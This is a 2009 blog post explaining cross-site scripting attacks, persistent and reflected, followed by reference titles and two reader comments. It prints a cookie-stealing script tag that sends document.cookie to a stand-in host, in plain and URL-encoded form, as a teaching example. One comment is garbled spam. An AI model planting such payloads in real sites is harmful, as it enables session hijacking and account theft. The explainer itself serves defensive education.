Monday, May 25, 2009

XSS (Cross-site Scripting)

Cross-site Scripting (XSS) is an attack technique that forces a web site to echo attacker-supplied executable code, which loads in a user's browser. The code itself is usually written in HTML/JavaScript, but may also extend to VBScript, ActiveX, Java, Flash, or any other browser-supported technology.

When an attacker gets a user's browser to execute his code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have his account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the web site they are visiting. Cross- site Scripting attacks essentially compromise the trust relationship between a user and the web site.

There are two types of Cross-site Scripting attacks, non-persistent and persistent. Non-persistent attacks require a user to visit a specially crafted link laced with malicious code. Upon visiting the link, the code embedded in the URL will be echoed and executed within the user's web browser. Persistent attacks occur when the malicious code is submitted to a web site where it's stored for a period of time. Examples of an attacker's favorite targets often include message board posts, web mail messages, and web chat software. The unsuspecting user is not required to click on any link, just simply view the web page containing the code.


Persistent Attack
Many web sites host bulletin boards where registered users may post messages. A registered user is commonly tracked using a session ID cookie authorizing them to post. If an attacker were to post a message containing a specially crafted JavaScript, a user reading this message could have their cookies and their account compromised.

Cookie Stealing Code Snippet: <SCRIPT> document.location= 'http://attackerhost.example/cgi- bin/cookiesteal.cgi?'+document.cookie </SCRIPT> Non-Persistent Attack
Many web portals offer a personalized view of a web site and greet a logged in user with "Welcome, ". Sometimes the data referencing a logged in user are stored within the query string of a URL and echoed to the screen

Portal URL example:

In the example above we see that the username "Joe" is stored in the URL. The resulting web page displays a "Welcome, Joe" message. If an attacker were to modify the username field in the URL, inserting a cookie-stealing JavaScript, it would possible to gain control of the user's account.

A large percentage of people will be suspicious if they see JavaScript embedded in a URL, so most of the time an attacker will URL Encode their malicious payload similar to the example below.

URL Encoded example of Cookie Stealing URL: http://portal.example/index.php?sessionid=12312312& username=%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65 %6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70 %3A%2F%2F%61%74%74%61%63%6B%65%72%68%6F%73%74%2E%65 %78%61%6D%70%6C%65%2F%63%67%69%2D%62%69%6E%2F%63%6F %6F%6B%69%65%73%74%65%61%6C%2E%63%67%69%3F%27%2B%64 %6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3C%2F%73 %63%72%69%70%74%3E Decoded example of Cookie Stealing URL: http://portal.example/index.php?sessionid=12312312& username=<script>document.location='http://attacker host.example/cgi-bin/cookiesteal.cgi?'+document.cookie</script>


"CERT Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests"

"The Cross Site Scripting FAQ" -

"Cross Site Scripting Info"

"24 Character entity references in HTML 4"

"Understanding Malicious Content Mitigation for Web Developers"

"Cross-site Scripting: Are your web applications vulnerable?", By
Kevin Spett - SPI Dynamics

"Cross-site Scripting Explained", By Amit Klein - Sanctum

"HTML Code Injection and Cross-site Scripting", By Gunter Ollmann

Source: Cross-site Scripting (XSS)


  1. I countenance, I make not been on this webpage in a ensbobetdless time? withal it was added feeling to see It is such an vital content and ignored by so numerous, alter professionals. I thsboank you to service making grouping more alive of practical issueExcellent whatsis as exemplary.

  2. nice topic thank you and thumb up !